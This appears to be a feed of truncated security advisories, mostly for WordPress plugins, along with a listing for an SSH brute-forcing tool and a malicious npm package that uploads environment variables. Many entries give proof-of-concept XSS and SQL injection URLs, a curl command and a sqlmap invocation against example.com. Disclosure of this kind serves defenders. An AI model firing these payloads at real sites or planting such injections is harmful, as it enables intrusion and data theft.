VikBooking < 1.5.9 - Reflected Cross-Site Scripting
The plugin does not escape the current URL before putting it back in a JavaScript context, leading to a Reflected Cross-Site Scripting issue. https://example.com/wp-admin/?test%22-alert/XSS/-%22 https://example.com/wp-admin/profile.php?test%22-alert/XSS/-%22...
Wow Countdowns <= 3.1.2 - Admin+ SQLi
The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection. https://example.com/wp-admin/admin.php?page=mwp-countdown&info=del&did=1+AND+SELECT+5382+FROM+SELECTSLEEP5PpNt...
Give < 2.17.3 - Reflected Cross-Site Scripting via Donation Forms Dashboard
The plugin does not escape the s parameter before outputting it back in an attribute in the Donation Forms dashboard, leading to a Reflected Cross-Site Scripting...
Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection
The plugin does not escape the discountcode parameter in one of its REST routes available to unauthenticated users before using it in a SQL statement, leading to a SQL injection. https://example.com/?restroute=/pmpro/v1/checkoutlevel&levelid=3&discountcode=%27%20%20union%20select%20sleep1%20--%20g...
NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS
The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue curl -H 'x-tomato: alert/XSS/;' 'https://example.com/?nxs-cronrun=yes' The XSS will be triggered in the Log/History...
Profile Extra Fields < 1.2.4 - Reflected Cross-Site Scripting
The plugin does not escape the role parameter when outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=profile-extra-fields.php&tab-action=userdata&role="alert/XSS/...
Login/Signup Popup < 2.2 - Reflected Cross-Site Scripting
The plugin does not escape its tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=xoo-el-fields&tab="alert/XSS/...
WooCommerce Products Table < 1.0.4 - Reflected Cross-Site Scripting
The plugin does not sanitise or escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting issues https://example.com/?woot-remote-page=alert/XSS-page/&anchor=1&width=alert/XSS-width/ https://example.com/?woot-remote-page=1&anchor=1&arbitrary=...
Contact Form Entries < 1.2.1 - Reflected Cross-Site Scripting
The plugin does not escape some of its filters before outputting them back in the admin dashboard, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=vxcfleads&tab=entries&startdate="alert/XSS-startdate/&enddate="alert/XSS-enddate/...
SMTP Mail < 1.2 - Reflected Cross-Site Scripting (XSS)
The plugin does not escape its page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Jock on air now < 5.6.2 - Reflected Cross-Site Scripting
The plugin does not escape $_SERVER['PHP_SELF'] before outputting it back in an attribute in its settings, leading to a Reflected Cross-Site Scripting issue. https://example.com/wp-admin/admin.php/"alert/XSS//?page=joansettings...
Orbitaldump - A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python
A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works: When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list usually thousands ...
Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS https://example.com/giveaway/mygiveaways/?share=%3Cscript%3Ealertdocument.domain%3C/script%3E...
Activity Log < 2.7.0 - Authenticated SQL Injection
The plugin was vulnerable to SQL Injection in the order column of the past events table. time curl 'http://www.example.com/wp-admin/admin.php?page=activitylogpage&orderby=histtime%20AND%20SLEEP%280%29' -H 'Cookie: ...'...
Goto < 2.1 - Unauthenticated Blind SQL Injection
The theme did not sanitise, validate or escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue. sqlmap --url="https://example.com/tour-list/?keywords=13&startdate=13" --random-agent -dbs --level=3 --threads=4...
Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert1;...
Event Banner <= 1.3 - Arbitrary File Upload to RCE
The plugin does not verify the uploaded image file, allowing admin accounts to upload arbitrary files, such as .exe, .php, or other executables, leading to RCE. Due to the lack of a CSRF check, the issue can also be exploited via that vector to achieve the same result, or via a LFI as authorisation chec...
Modal Survey < 2.0.1.8.2 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=modalsurveyparticipants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E...
Logitech: Host Header injection in oslo.io (using X-Forwarded-For header) leading to email spoofing
Hello team, I hope it will be a happy year for you and for me 😇 Summary: I found Host Header injection in oslo.io. I tried to use it to show the security effect on users, and I found this. Steps To Reproduce: 1. Well, first of all, enter your project. 2. Make an invitation by email. 3. Now through the...
Malicious Package in evil-package
All versions of evil-package contain malicious code. The package uploads the contents of process.env to example.com/log. Recommendation: Remove the package from your environment. Given the host to which the information was uploaded, there is no further indication of compromise...